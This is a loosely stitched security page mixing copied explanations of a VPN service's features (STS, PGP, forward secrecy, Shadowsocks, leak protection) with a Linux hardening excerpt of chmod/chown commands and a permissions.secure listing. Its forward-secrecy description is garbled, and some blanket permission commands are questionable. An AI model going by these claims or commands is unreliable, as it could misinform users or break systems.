protocol: https://en.wikipedia.org/wiki/Station-to-Station_protocol In public-key cryptography, the Station-to-Station (STS) protocol is a cryptographic key agreement scheme. The protocol is based on classic Diffie-Hellman, and provides mutual key and entity authentication. Unlike the classic Diffie-Hellman, which is not secure against a man-in-the-middle attack, this protocol assumes that the parties have signature keys, which are used to sign messages, thereby providing security against man-in-the-middle attacks. In addition to protecting the established key from an attacker, the STS protocol uses no timestamps and provides perfect forward secrecy. It also entails two-way explicit key confirmation, making it an authenticated key agreement with key confirmation (AKC) protocol. https://en.wikipedia.org/wiki/ Block_cipher_mode_of_operation#CBC Pretty Good Privacy PGP encryption uses a serial combination of hashing, data compression, symmetric-key cryptography, and finally public-key cryptography; each step uses one of several supported algorithms. Each public key is bound to a username or an e-mail address. The first version of this system was generally known as a web of trust to contrast with the X.509 system, which uses a hierarchical approach based on certificate authority and which was added to PGP implementations later. Current versions of PGP encryption include both options through an automated key management server. https://en.wikipedia.org/wiki/Pretty_Good_Privacy Perfect Forward Secrecy With Perfect Forward Secrecy, even if a dedicated opponent is somehow able to attack the computer or server during a session, they will not be able to decrypt traffic from past sessions. The provider uses namely with each connection a new secret key. Even if you remain connected to the Server for a long period of time, the provider automatically changes the key every 60 minutes. This key renewal process every 60 minutes guarantees "Forward Secrecy". So if an attacker succeeds in compromising the key, in the worst case scenario, he could track the data for up to 60 minutes. Then everything is secret again. https://en.wikipedia.org/wiki/Forward_secrecy Shadowsocks SOCKS5 proxy (all servers) Shadowsocks Proxy can be used by the provider through the application (Mac OS X, Windows, Linux, iOS, Android, Windows 10 Mobile). In addition, there is an advantage that "shadow socks" can not even be blocked in highly restrictive networks. https://shadowsocks.org/en/index.html Smart DNS Proxy (all servers) There are currently two common ways to circumvent geo-blocks of foreign video-on-demand services such as Hulu, Netflix or Vudu. The first way is to use SmartDNS services. The term SmartDNS hides on innovative technology that has been specifically designed to bypass the geo-blocking barrier. To configure the SmartDNS service, there is only a minimal change to the TCP/IP properties of the network connection. Then, the user can freely use many suspended streaming services regardless of their current whereabouts. http://www.unblock.ch/smart-dns-anbieter/ DNS-Leak: Eigene DNS-Server ohne Festplatten (RAM-Disk). Zusätzlich werden OpenDNS-Server (IPv6) verwendet (Auswahlmöglichkeit in den Einstellungen). Der Dienst schützt zuverlässig vor dem bekannten DNS-Leck. https://www.hongkiat.com/blog/creating-ram-drives/ https://www.tomshardware.com/news/what-we-know-ddr5-ram,39079.html https://www.opendns.com/about/innovations/ipv6/ IP-Leak: Eine eigene Software verhindert zuverlässig Angriffe bekannter DNS-Leak-Methoden. WebRTC-Leak: Der Service schützt zuverlässig vor dem bekannten WebRTC-Leak-Problem. Speicherschutz-Funktion (Schutz vor Serverausfällen): Diese Funktion ist in der Lage, den verfügbaren Arbeitsspeicher so aufzuteilen und laufende Programme so voneinander zu trennen, dass ein Programmierfehler oder Absturz eines einzelnen Programms nicht die Stabilität anderer Programme oder des Gesamtsystems beeinträchtigt (Speicherschutz-Mechanismus). Serverausfall (Schutzmöglichkeiten): Unterspannungsschutz (UVP) Überspannungsschutz (OVP) Kurzschlusssicherung (SCP) Überlastschutz (OPP) Überstromschutz (OCP) Überhitzungsschutz (OTP) Japanische 105°ree;C Kondensatoren (Lebensdauer vom Netzteil) Brandmelder (im Serverraum eingebaut) Diese Schutzfunktionen (Netzteil) können die meisten Serverausfälle verhindern. Anmeldeverfahren, Zwei-Faktor-Authentifizierung (TOTP) Two factor authentication can be implemented for SSH access or other application login, it will improve login security by adding a second factor of authentication, that is the password is typically known as something you know, while the second factor may be a physical security token or mobile device which acts as something you have. The combination of something you know and something you have ensures that you are more likely who you say you are. There are custom applications available for this such as Duo Securityand Google Authenticator as well as many others. These typically involve installing an application on a smart phone and then entering the generated code alongside your username and password when you authenticate. Google Authenticator can be used for many other applications than just SSH, such as for WordPress login with third party plugin support. https://www.rootusers.com/23-hardening-tips-to-secure-your-linux-server/ 4096 bit Verschlüsselung/Elliptische-Kurven-Kryptografie (Anmeldeverschlüsselungsarten)/ Zwei-Faktor-Authentifizierung/Verbindung (SSL/TLS Verschlüsselung)/Volle IPv6 Unterstützung/HMAC-Authentifizierung/Cipher Block Chaining/Diffie-Hellman-Schlüsselaustausch/STS-Protokoll (Station-to-Station)/Pretty Good Privacy/Perfect Forward Secrecy/Verschlüsselungstool (Cloud Storage/Backup)/Failure Backup-Lösung/NAT-Firewall/ DDoS-Schutzdienst/Lastverteilung/DNS-Leak/IP Leak/WebRTC Leak/WebRTC Leak/ Windows Login Leak/Künstliche Intelligenz (NeuroRouting™)/Zero-Knowledge-Beweis/ Fiat-Shamir-Protokoll/Schnorr-Identifikation/SecureCore-Funktion (Sicherheitskern)/ 4096 bit Verschlüsselung: https://www.pcwelt.de/ratgeber/Verschluesselung_-_Was_ist_noch_unknackbar_-Sicherheits-Check-8845011.html https://www.heise.de/security/artikel/Kryptographie-in-der-IT-Empfehlungen-zu-Verschluesselung-und-Verfahren-3221002.html?seite=all Diese sind für die Verschlüsselung empfehlenswert. Hochsichere Elliptische-Kurven-Kryptografie (Anmeldeverschlüsselungsarten): https://de.wikipedia.org/wiki/Elliptic_Curve_Cryptography https://www.heise.de/select/ix/2017/3/1487529933065685 https://www.computerweekly.com/de/definition/Elliptische-Kurven-Kryptografie-Elliptic-Curve-Cryptography-ECC https://www.globalsign.com/de-de/blog/ecc-101/ https://www.ssl247.de/certificats-ssl/rsa-dsa-ecc Zwei-Faktor-Authentifizierung (TOTP): https://de.wikipedia.org/wiki/Zwei-Faktor-Authentisierung https://www.pcwelt.de/ratgeber/Wichtige_Dienste_per_Zwei-Faktor-Authentifizierung_schuetzen-Sicherheit-8679969.html https://www.security-insider.de/flexiblere-zwei-faktor-authentifizierung-an-vpns-a-700259/ https://www.security-insider.de/remote-access-vpn-mit-zwei-faktor-authentifizierung-a-389000/ http://www.itseccity.de/produkte-services/it-security/vpn-loesungen/ncp-engineering090315.html Die Kundenkonten sind durch die Zwei-Faktor-Authentifizierung doppelt abgesichert und dadurch sehr schwierig zu hacken. Die Aktivierung der Zwei-Faktor-Authentifizierung ist freiwillig (Auswahlmöglichkeit im Kundenkonto). Wenn man die Zwei-Faktor-Authentifizierung aktiviert, benötigt man zum Login in die Desktopversion (PC) immer die Authenticator-App. Authenticator-App: a) FreeOTP Authenticator b) Authy c) Microsoft Authenticator d) LastPass Authenticator e) Google Authenticator Die Zwei-Faktor-Authentifizierung ist sofort aktiv und scharf geschaltet. Bereits beim nächsten Login muss der 6-stellige Code, der beim Aufruf der Authenticator-App für das Kundenkonto angezeigt wird, in das dafür vorgesehene Feld (Authenticator-Code) eingegeben werden. ändert die Gruppe für Dateisystemobjekte. Für den Vollzugriff für Besitzer und Gruppe genügen dann bei Verzeichnissen die Rechte 770 sowie bei Dateien 660 bzw. 775 -> 770, 755 ->, 750, 641 ->, 640 usw.. Zur Gruppe von root sollten in diesem allgemeinen Fall zumindest folgende User angehören: Standardgruppe root, uuid, lp, lpadmin, tty, user und toruser. Damit aber ist ein wenig Vorsicht geboten! Wir lassen die Zuweisung einzelner Benutzer zur Gruppe von root künftig daher weitgehend außer acht. Wer will, kann hier vorgestellte Eigentums-, Gruppen- und Zugriffsrechte auf diese Art und Weise noch weiter restriktrieren als hier im Exkurs vorgestellt! /etc/rc.local chmod 700 -R /etc/init.d # besser: sämtliche chown und chmod in /etc/permissions.secure in der vorgesehenen Form eintragen! chmod 700 -R /etc/rc5.d chmod 400 /etc/shadow* chmod 400 path_to_keyfile_for_LUKS_encrypted_partitions ... Wir führen bald viele empfohlenen Zugriffsrechte auf. Um an dieser Stelle für /etc/rc.local einen ersten Eindruck zu gewinnen. Setze "unbedingt" noch in /etc/permissions.local "/usr/sbin/suexec root:root 0755" und nicht 4755 ! Sie sichern nicht nur, sie machen das Arbeitstempo des Rechners auch mausklick-schnell: chown root:root / # besser: Sämtliche chown und chmod in anderer Form in /etc/permissions.secure eintragen! chown root:root /* chmod 111 / chmod 755 /usr # 755 needed for caffeine only, else 751 chmod 751 /bin chmod 751 /var # bzw. 750, wenn user zur Gruppe von root gehört chmod 751 /sbin chmod 751 /lib64 chmod 751 /usr/lib64 # chmod 751 -R /usr/lib64/python2.6 # chmod 751 -R /usr/lib/python2.6 # shall have got the same include as /usr/lib64/python2.6 chmod 751 /usr/lib64/kde4 chmod 751 /etc # bzw. chmod 750, falls oben aufgelistete Gruppen zu root gehören, das gleiche für /opt und /var und ein paar weitere Verzeichnisse und Dateien; wir gehen diesem Fall aber nicht weiter nach. chmod 755 /etc/* # bzw. chmod 750, falls oben aufgelistete Gruppen zu root gehören; das Gleiche für /opt und /var und ein paar weitere Verzeichnisse und Dateien; wir gehen diesem Fall aber nicht weiter nach. chmod 755 /etc/bashrc chmod 755 /etc/group chmod 755 -R /etc/font* chmod 755 -R /etc/pango* chown root:root /etc/nsswitch.conf chmod 755 /etc/nsswitch.conf chmod 755 /etc/ld.so.preload chmod 755 /etc/sysconfig/network chmod 755 /etc/sysconfig/network-scripts chown root:root -R /etc/init.d chown root:root -R /etc/rc*.d chmod 700 -R /etc/init.d chmod 700 -R /etc/rc0.d chmod 700 -R /etc/rc1.d chmod 700 -R /etc/rc2.d chmod 700 -R /etc/rc3.d chmod 700 -R /etc/rc4.d chmod 700 -R /etc/rc5.d chmod 700 -R /etc/rc6.d chown root:root -R /etc/modprobe* chmod 700 -R /etc/modprobe* chown root:shadow /etc/shadow chmod 400 /etc/shadow* chown root:root /etc/passwd chmod 644 /etc/passwd* chown root:root /etc/fstab* chmod 400 /etc/fstab* chown root:root /etc/crypttab* chmod 700 /etc/crypttab* chown root:root /etc/mtab* chown root:root /etc/hosts chmod 644 /etc/hosts chmod 644 /etc/mtab* # chmod 700: kdf arbeitet nicht chmod 755 /etc/login.defs chmod 755 -R /etc/firejail chmod 755 -R /etc/resolv.conf chmod 755 -R /etc/xdg* chmod 750 /opt # if user is group of root, else 751 chmod 751 /lib chmod 700 /root chmod 751 /initrd chmod 751 /misc chmod 700 -R /boot-save # boot-save: copy of /boot/* chown root:root /usr/bin chown root:root /usr/sbin chown root:root /usr/lib64 chown root:root /usr/lib chown root:root /usr/libexec chown root:root /usr/share chown root:root /root chmod 700 /usr/bin/xterm # terminals (außder der favorisierten) chmod 700 /usr/bin/aterm chmod 700 /usr/bin/byobu* chmod 700 /usr/bin/terminator* chmod 700 /usr/bin/quadkonsole* chmod 700 /usr/bin/lxterminal* chmod 700 /usr/bin/yakuake* chmod 700 /usr/bin/aterm chmod 700 /usr/bin/multi-aterm chmod 700 /usr/bin/tcsh* chmod 700 /usr/bin/rxvt* chown root:firejail /usr/bin/firejail chmod 04750 /usr/bin/firejail # Beachte, dass hierfür surfuser Mitglied der Gruppe firejail von firejail sein muss ! chmod 644 /etc/passwd chmod 644 /etc/security/msec/*.secure chmod 711 /home chmod 700 /home/user chmod 700 /home/surfuser chmod 700 /home/uuidd chmod 700 /home/toruser chmod 700 -R /home/user/Dokumente # # from permissions (OpenSuSE, chkstat), level: secure with some changes, /etc/permssions.secure / root:root 111 /root/ root:root 700 /root/* root:root 700 /tmp/ root:root 1777 /tmp/.X11-unix/ root:root 1777 /tmp/.ICE-unix/ root:root 1777 /dev/ root:root 755 /bin/ root:root 751 /sbin/ root:root 751 /lib/ root:root 751 /etc/ root:root 751 /home/ root:root 711 /boot/ root:root 755 /opt/ root:root 751 /usr/ root:root 755 /usr/src root:root 700 /usr/local root:root 755 # # /var: # /var/tmp/ root:root 1777 /var/log/ root:root 755 /var/spool/ root:root 755 /var/spool/mqueue/ root:root 700 /var/spool/news/ news:news 775 /var/spool/voice/ root:root 755 /var/spool/mail/ root:root 1777 /var/spool/cups root:sys 755 /var/spool/hylafax root:root 755 /var/spool/postfix root:root 755 /var/spool/MailScanner root:root 755 /var/adm/ root:root 755 /var/adm/backup/ root:root 700 /var/cache/ root:root 755 /var/cache/man/ man:root 755 /var/run/nscd/socket root:root 666 /run/nscd/socket root:root 666 /var/run/sudo/ root:root 700 /run/sudo/ root:root 700 # # login tracking # /var/log/lastlog root:root 644 /var/log/faillog root:root 600 /var/log/wtmp root:utmp 664 /var/log/btmp root:utmp 600 /var/run/utmp root:utmp 664 /run/utmp root:utmp 664 # # some device files # /dev/zero root:root 666 /dev/null root:root 666 /dev/full root:root 666 /dev/ip root:root 660 /dev/initrd root:disk 660 /dev/kmem root:kmem 640 # # /etc # /etc/lilo.conf root:root 600 /etc/passwd root:root 644 /etc/shadow root:shadow 400 /etc/init.d/ root:root 755 /etc/hosts root:root 644 # Changing the hosts_access(5) files causes trouble with services # that do not run as root! /etc/hosts.allow root:root 644 /etc/hosts.deny root:root 644 /etc/hosts.equiv root:root 644 /etc/hosts.lpd root:root 644 /etc/ld.so.conf root:root 644 /etc/ld.so.cache root:root 644 /etc/opiekeys root:root 600 /etc/ppp/ root:root 750 /etc/ppp/chap-secrets root:root 600 /etc/ppp/pap-secrets root:root 600 # sysconfig files: /etc/sysconfig/network/providers/ root:root 700 # utempter /usr/lib/utempter/utempter root:utmp 2755 # ensure correct permissions on ssh files to avoid sshd refusing # logins (bnc#398250) /etc/ssh/ssh_host_key root:root 600 /etc/ssh/ssh_host_key.pub root:root 644 /etc/ssh/ssh_host_dsa_key root:root 600 /etc/ssh/ssh_host_dsa_key.pub root:root 644 /etc/ssh/ssh_host_rsa_key root:root 600 /etc/ssh/ssh_host_rsa_key.pub root:root 644 /etc/ssh/ssh_config root:root 644 /etc/ssh/sshd_config root:root 640 # # legacy # # new traceroute program by Olaf Kirch does not need setuid root any more. /usr/sbin/traceroute root:root 755 # games:games 775 safe as long as we don´t change files below it (#103186) # still people do it (#429882) so root:root 755 is the consequence. /var/games/ root:root 0755 # No longer common. Set setuid bit yourself if you need it # (#66191) #/usr/bin/ziptool root:trusted 0750 # # udev static devices (#438039) # /lib/udev/devices/net/tun root:root 0666 /lib/udev/devices/null root:root 0666 /lib/udev/devices/ptmx root:tty 0666 /lib/udev/devices/tty root:tty 0666 /lib/udev/devices/zero root:root 0666 # # named chroot (#438045) # /var/lib/named/dev/null root:root 0666 /var/lib/named/dev/random root:root 0666 # opiesu is not allowed setuid root as code quality is bad (bnc#882035) /usr/bin/opiesu root:root 0755 # we no longer make rpm build dirs 1777 /usr/src/packages/SOURCES/ root:root 0755 /usr/src/packages/BUILD/ root:root 0755 /usr/src/packages/BUILDROOT/ root:root 0755 /usr/src/packages/RPMS/ root:root 0755 /usr/src/packages/RPMS/alphaev56/ root:root 0755 /usr/src/packages/RPMS/alphaev67/ root:root 0755 /usr/src/packages/RPMS/alphaev6/ root:root 0755 /usr/src/packages/RPMS/alpha/ root:root 0755 /usr/src/packages/RPMS/amd64/ root:root 0755 /usr/src/packages/RPMS/arm4l/ root:root 0755 /usr/src/packages/RPMS/armv4l/ root:root 0755 /usr/src/packages/RPMS/armv5tejl/ root:root 0755 /usr/src/packages/RPMS/armv5tejvl/ root:root 0755 /usr/src/packages/RPMS/armv5tel/ root:root 0755 /usr/src/packages/RPMS/armv5tevl/ root:root 0755 /usr/src/packages/RPMS/armv6l/ root:root 0755 /usr/src/packages/RPMS/armv6vl/ root:root 0755 /usr/src/packages/RPMS/armv7l/ root:root 0755 /usr/src/packages/RPMS/athlon/ root:root 0755 /usr/src/packages/RPMS/geode/ root:root 0755 /usr/src/packages/RPMS/hppa2.0/ root:root 0755 /usr/src/packages/RPMS/hppa/ root:root 0755 /usr/src/packages/RPMS/i386/ root:root 0755 /usr/src/packages/RPMS/i486/ root:root 0755 /usr/src/packages/RPMS/i586/ root:root 0755 /usr/src/packages/RPMS/i686/ root:root 0755 /usr/src/packages/RPMS/ia32e/ root:root 0755 /usr/src/packages/RPMS/ia64/ root:root 0755 /usr/src/packages/RPMS/mips/ root:root 0755 /usr/src/packages/RPMS/noarch/ root:root 0755 /usr/src/packages/RPMS/pentium3/ root:root 0755 /usr/src/packages/RPMS/pentium4/ root:root 0755 /usr/src/packages/RPMS/powerpc64/ root:root 0755 /usr/src/packages/RPMS/powerpc/ root:root 0755 /usr/src/packages/RPMS/ppc64/ root:root 0755 /usr/src/packages/RPMS/ppc/ root:root 0755 /usr/src/packages/RPMS/s390/ root:root 0755 /usr/src/packages/RPMS/s390x/ root:root 0755 /usr/src/packages/RPMS/sparc64/ root:root 0755 /usr/src/packages/RPMS/sparc/ root:root 0755 /usr/src/packages/RPMS/sparcv9/ root:root 0755 /usr/src/packages/RPMS/x86_64/ root:root 0755 /usr/src/packages/SPECS/ root:root 0755 /usr/src/packages/SRPMS/ root:root 0755 # # /etc # /etc/crontab root:root 600 /etc/exports root:root 644 /etc/fstab root:root 400 /etc/ftpusers root:root 644 /var/lib/nfs/rmtab root:root 644 /etc/syslog.conf root:root 600 /etc/ssh/sshd_config root:root 600 # we might want to tighten that up in the future in this profile (remove the # ability for others to read/enter) /etc/cron.d root:root 755 /etc/cron.daily root:root 755 /etc/cron.hourly root:root 755 /etc/cron.monthly root:root 755 /etc/cron.weekly root:root 755 # # suid system programs that need the suid bit to work: # /bin/su root:root 4755 # disable at and cron for users that do not belnong to the group "trusted" /usr/bin/at root:trusted 4750 /usr/bin/crontab root:trusted 4750 /usr/bin/gpasswd root:shadow 0755 /usr/bin/newgrp root:root 0755 /usr/bin/passwd root:shadow 0755 /usr/bin/chfn root:shadow 0755 /usr/bin/chage root:shadow 0755 /usr/bin/chsh root:shadow 0755 /usr/bin/expiry root:shadow 0755 /usr/bin/sudo root:root 0755 /usr/sbin/su-wrapper root:root 0755 # opie password system # /usr/bin/opiepasswd root:root 0755 # /sbin/mount.nfs root:root 0755 # # /usr/bin/fusermount root:trusted 0700 # needs setuid root when using shadow via NIS: # /sbin/unix_chkpwd root:shadow 0755 /sbin/unix2_chkpwd root:shadow 0755 # squid changes /var/cache/squid/ squid:root 0750 /var/log/squid/ squid:root 0750 /usr/sbin/pinger squid:root 0750 +capabilities cap_net_raw=ep /usr/sbin/basic_pam_auth root:shadow 0750 # still to be converted to utempter /usr/lib/gnome-pty-helper root:utmp 0755 # # mixed section: most of it is disabled in this permissions.secure: # # video /usr/bin/v4l-conf root:video 0750 # turned off write and wall by disabling sgid tty: /usr/bin/wall root:tty 0755 /usr/bin/write root:tty 0755 # thttpd: sgid + executeable only for group www. Useless... /usr/bin/makeweb root:www 2750 # pcmcia: # Needs setuid to eject cards (#100120) /sbin/pccardctl root:trusted 4750 # gnokii nokia cellphone software # #66209 /usr/sbin/mgnokiidev root:uucp 755 # mailman mailing list software # #66315 /usr/lib/mailman/cgi-bin/admin root:mailman 2755 /usr/lib/mailman/cgi-bin/admindb root:mailman 2755 /usr/lib/mailman/cgi-bin/edithtml root:mailman 2755 /usr/lib/mailman/cgi-bin/listinfo root:mailman 2755 /usr/lib/mailman/cgi-bin/options root:mailman 2755 /usr/lib/mailman/cgi-bin/private root:mailman 2755 /usr/lib/mailman/cgi-bin/roster root:mailman 2755 /usr/lib/mailman/cgi-bin/subscribe root:mailman 2755 /usr/lib/mailman/cgi-bin/confirm root:mailman 2755 /usr/lib/mailman/cgi-bin/create root:mailman 2755 /usr/lib/mailman/cgi-bin/editarch root:mailman 2755 /usr/lib/mailman/cgi-bin/rmlist root:mailman 2755 /usr/lib/mailman/mail/mailman root:mailman 2755 # libgnomesu (#75823, #175616) /usr/lib/libgnomesu/gnomesu-pam-backend root:root 0755 # # networking (need root for the privileged socket) # /usr/bin/ping root:root 0755 +capabilities cap_net_raw=ep /usr/bin/ping6 root:root 0755 +capabilities cap_net_raw=ep # mtr is linked against ncurses. no suid bit, for root only: /usr/sbin/mtr root:dialout 0750 /usr/bin/rcp root:root 0000 /usr/bin/rlogin root:root 0000 /usr/bin/rsh root:root 0000 # exim /usr/sbin/exim root:root 0755 # # dialup networking programs # /usr/sbin/pppoe-wrapper root:dialout 0750 # i4l package (#100750): /sbin/isdnctrl root:dialout 4750 # #66111 /usr/bin/vboxbeep root:trusted 0755 # # linux text console utilities # # setuid needed on the text console to set the terminal content on ctrl-o # #66112 /usr/lib/mc/cons.saver root:root 0755 # # terminal emulators # This and future SUSE products have support for the utempter, a small helper # program that does the utmp/wtmp update work with the necessary rights. # The use of utempter obsoletes the need for sgid bits on terminal emulator # binaries. We mention screen here, but all other terminal emulators have # moved to /etc/permissions, with modes set to 0755. # needs setuid to access /dev/console # framebuffer terminal emulator (japanese) /usr/bin/jfbterm root:tty 0755 # # kde # (all of them are disabled in permissions.secure except for # the helper programs) # # needs setuid root when using shadow via NIS: # #66218 /usr/lib64/kde4 root:root 751 /usr/lib/kde4/libexec/kcheckpass root:shadow 0755 /usr/lib64/kde4/libexec/kcheckpass root:shadow 0755 /usr/lib/kde4/libexec/kdesud root:nogroup 0755 /usr/lib64/kde4/libexec/kdesud root:nogroup 0755 /usr/lib/libexec/kf5/kdesud root:nogroup 0755 /usr/lib64/libexec/kf5/kdesud root:nogroup 0755 # bnc#523833 /usr/lib/kde4/libexec/start_kdeinit root:root 0755 /usr/lib64/kde4/libexec/start_kdeinit root:root 0755 # # amanda # /usr/sbin/amcheck root:amanda 0750 /usr/lib/amanda/calcsize root:amanda 0750 /usr/lib/amanda/rundump root:amanda 0750 /usr/lib/amanda/planner root:amanda 0750 /usr/lib/amanda/runtar root:amanda 0750 /usr/lib/amanda/dumper root:amanda 0750 /usr/lib/amanda/killpgrp root:amanda 0750 # # gnats # /usr/lib/gnats/gen-index gnats:root 4555 /usr/lib/gnats/pr-edit gnats:root 4555 /usr/lib/gnats/queue-pr gnats:root 4555 # # news (inn) # # the inn start script changes it´s uid to news:news. Later innbind # is called by this user. Those programs do not need to be called by # anyone else, therefore the strange permissions 4554 are required # for operation. (#67032, #594393) # /usr/lib/news/bin/rnews news:uucp 4550 /usr/lib/news/bin/inews news:news 2555 /usr/lib/news/bin/innbind root:news 4550 # # sendfax # # restrictive, only for "trusted" group users: /usr/lib/mgetty+sendfax/faxq-helper fax:root 4755 /var/spool/fax/outgoing/ fax:root 0755 /var/spool/fax/outgoing/locks fax:root 0755 # # uucp # /var/spool/uucppublic/ root:uucp 1770 /usr/bin/uucp uucp:uucp 6555 /usr/bin/uuname uucp:uucp 6555 /usr/bin/uustat uucp:uucp 6555 /usr/bin/uux uucp:uucp 6555 /usr/lib/uucp/uucico uucp:uucp 6555 /usr/lib/uucp/uuxqt uucp:uucp 6555 # pcp (bnc#782967) /var/lib/pcp/tmp/ root:root 0755 /var/lib/pcp/tmp/pmdabash/ root:root 0755 /var/lib/pcp/tmp/mmv/ root:root 0755 /var/lib/pcp/tmp/pmlogger/ root:root 0755 /var/lib/pcp/tmp/pmie/ root:root 0755 # PolicyKit (#295341) /usr/lib/PolicyKit/polkit-set-default-helper polkituser:root 4755 /usr/lib/PolicyKit/polkit-read-auth-helper root:polkituser 2755 /usr/lib/PolicyKit/polkit-revoke-helper root:polkituser 2755 /usr/lib/PolicyKit/polkit-explicit-grant-helper root:polkituser 2755 /usr/lib/PolicyKit/polkit-grant-helper root:polkituser 2755 /usr/lib/PolicyKit/polkit-grant-helper-pam root:polkituser 4750 # polkit new (bnc#523377) /usr/lib/polkit-1/polkit-agent-helper-1 root:root 4755 /usr/bin/pkexec root:root 4755 # dbus-1 (#333361) /lib/dbus-1/dbus-daemon-launch-helper root:messagebus 4750 /lib64/dbus-1/dbus-daemon-launch-helper root:messagebus 4750 # dbus-1 in /usr #1056764) /usr/lib/dbus-1/dbus-daemon-launch-helper root:messagebus 4750 /usr/lib64/dbus-1/dbus-daemon-launch-helper root:messagebus 4750 # policycoreutils (#440596) /usr/bin/newrole root:root 0755 # VirtualBox (#429725) /usr/lib/virtualbox/VirtualBox root:vboxusers 0755 # bsc#1120650 /usr/lib/virtualbox/VirtualBoxVM root:vboxusers 0750 /usr/lib/virtualbox/VBoxHeadless root:vboxusers 0755 /usr/lib/virtualbox/VBoxSDL root:vboxusers 0755 # (bnc#533550) /usr/lib/virtualbox/VBoxNetAdpCtl root:vboxusers 0755 # bnc#669055 /usr/lib/virtualbox/VBoxNetDHCP root:vboxusers 0755 # bsc#1033425 /usr/lib/virtualbox/VBoxNetNAT root:vboxusers 0755 # open-vm-tools (bnc#474285) /usr/bin/vmware-user-suid-wrapper root:root 0755 # lockdev (bnc#588325) /usr/sbin/lockdev root:lock 2755 # hawk (bnc#665045) /usr/sbin/hawk_chkpwd root:haclient 4750 /usr/sbin/hawk_invoke root:haclient 4750 # chromium (bnc#718016) /usr/lib/chrome_sandbox root:root 4755 # ecryptfs-utils (bnc#740110) /sbin/mount.ecryptfs_private root:root 0755 # wireshark (bsc#957624) /usr/bin/dumpcap root:wireshark 0750 +capabilities cap_net_raw,cap_net_admin=ep # singularity (bsc#1028304) # these have been dropped in version 2.4 (see bsc#1111411, comment 4) #/usr/lib/singularity/bin/expand-suid root:singularity 4750 #/usr/lib/singularity/bin/create-suid root:singularity 4750 #/usr/lib/singularity/bin/export-suid root:singularity 4750 #/usr/lib/singularity/bin/import-suid root:singularity 4750 /usr/lib/singularity/bin/action-suid root:singularity 4750 /usr/lib/singularity/bin/mount-suid root:singularity 4750 /usr/lib/singularity/bin/start-suid root:singularity 4750 /usr/bin/su root:root 4755 /usr/bin/mount root:root 0755 /usr/bin/umount root:root 0755 # cdrecord of cdrtools from Joerg Schilling (bnc#550021) # in secure mode, no provisions are made for reliable cd burning, as admins # will have very likely prohibited that anyway. /usr/bin/cdrecord root:root 755 /usr/bin/readcd root:root 755 /usr/bin/cdda2wav root:root 755 # qemu-bridge-helper (bnc#765948, bsc#988279) /usr/lib/qemu-bridge-helper root:kvm 04750 # systemd-journal (bnc#888151) /var/log/journal/ root:systemd-journal 2755 #iouyap (bnc#904060) /usr/lib/iouyap root:iouyap 0750 # radosgw (bsc#943471) /usr/bin/radosgw root:www 0750 +capabilities cap_net_bind_service=ep # gstreamer ptp (bsc#960173) /usr/lib/gstreamer-1.0/gst-ptp-helper root:root 0755 +capabilities cap_net_bind_service=ep # # suexec is only secure if the document root doesn´t contain files # writeable by wwwrun. Make sure you have a safe server setup # before setting the setuid bit! See also # https://bugzilla.novell.com/show_bug.cgi?id=263789 # http://httpd.apache.org/docs/trunk/suexec.html # You need to override this in permissions.local. # suexec2 is a symlink for now, leave as-is # /usr/sbin/suexec root:root 0755 # newgidmap / newuidmap (bsc#979282, bsc#1048645) /usr/bin/newgidmap root:shadow 4755 /usr/bin/newuidmap root:shadow 4755 # kwayland (bsc#1062182) /usr/bin/kwin_wayland root:root 0755 +capabilities cap_sys_nice=ep # gvfs (bsc#1065864) /usr/lib/gvfs/gvfsd-nfs root:root 0755 # icinga2 (bsc#1069410) /run/icinga2/cmd icinga:icingagmd 2750 # fping (bsc#1047921) /usr/sbin/fping root:root 0755 +capabilities cap_net_raw=ep # usbauth (bsc#1066877) /usr/bin/usbauth-npriv root:usbauth 04750 /usr/lib/usbauth-notifier root:usbauth-notifier 0750 /usr/lib/usbauth-notifier/usbauth-notifier root:usbauth 02755 # spice-gtk (bsc#1101420) /usr/bin/spice-client-glib-usb-acl-helper root:kvm 04750 # smc-tools (bsc#1102956) /usr/lib/libsmc-preload.so root:root 04755 /usr/lib64/libsmc-preload.so root:root 04755 # lxc (bsc#988348) /usr/lib/lxc/lxc-user-nic root:kvm 04750 # firejail (bsc#1059013) /usr/bin/firejail root:firejail 04750 # Beachte, dass hierfür surfuser Mitglied der Gruppe firejail von firejail sein muss ! # authbind (bsc#1111251) /usr/lib/authbind/helper root:root 04755 # fuse3 (bsc#1111230) /usr/bin/fusermount3 root:trusted 04750 # 389-ds (bsc#1111564) /usr/sbin/ns-slapd root:dirsrv 0750 / root:root 111 /home root:root 711 /home/user user:user 700 /home/surfuser surfuser:surfuser 700 /home/toranonym toruser:torgroup 700 /usr/src root:root 700 /usr/lib64 root:root 751 /usr/lib64/kde4 root:root 751 /usr root:root 755 /bin root:root 751 /sbin root:root 751 /lib64 root:root 751 /lib root:root 751 /root root:root 700 /initrd root:root 751 /misc root:root 751 /boot-save root:root 000 /usr/games root:root 751 /net root:root 751 /secoff root:root 710 /sid-root root:root 700 /srv root:root 751 /sys root:root 751 /var root:root 751 /mnt root:root 755 /media root:root 711 /initrd root:root 751 /etc/security/msec/*.secure root:root 751 /usr/local root:root 755 /usr/local/Brother root:root 755 /GenuineIntel.bin root:root 710 /Module.symvers root:root 751 /usr/lib/cups root:sys 755 /usr/share/cups root:sys 755 /etc/cups root:sys 755 /smack root:root 700 /usr/share root:root 755 /usr/share/* root:root 755 /usr/libexec root:root 751 /usr/libexec/* root:root 755 /usr/lib64/kde4 root:root 751 /home/user/Dokumente user:user 700 /home/user/Dokumente/* user:user 700 /home/user/.kde4 user:user 700 /home/user/.kde4/* user:user 700 /home/user/.kde4/share/apps/kmail/mail secret:secret 700 /home/user/.kde4/share/apps/kmail/mail/*/*/* secret:secret 700 /home/surfuser/.mozilla surfuser:surfuser 100 /var/cache root:root 755 /var/cache/cups root:sys 775 /var/cache/cups/ppds.dat lp:sys 755 /var/cache/cups/job.cache root:sys 755 /var/cache/cups/help.index lp:sys 755 /var/cache/pdnsd pdnsd:pdnsd 755 /var/cache/pdnsd/pdnsd.cache pdnsd:pdnsd 755 /var/cache/coolkey root:root 755 /var/cache/urpmi root:root 755 /var/cache/apparmor root:root 755 /home/uuidd uuidd:uuidd 700 /usr/libexec root:root 755 /usr/lib/cups/filter root:sys 755 # Gruppe sys, abhängig von /etc/cups/cupsd.conf /usr/lib/cups/filter/* root:sys 755 /usr/lib/cups/driver root:sys 755 /usr/lib/cups/driver/* root:sys 755 /usr/share/cups/ root:sys 755 /usr/share/cups/* root:sys 755 /usr/share/cups/model/ root:sys 755 /var/spool root:root 755 /var/spool/MailScanner root:root 755 /usr/lib/cups/filter/* root:sys 755 /usr/lib/cups/driver/* 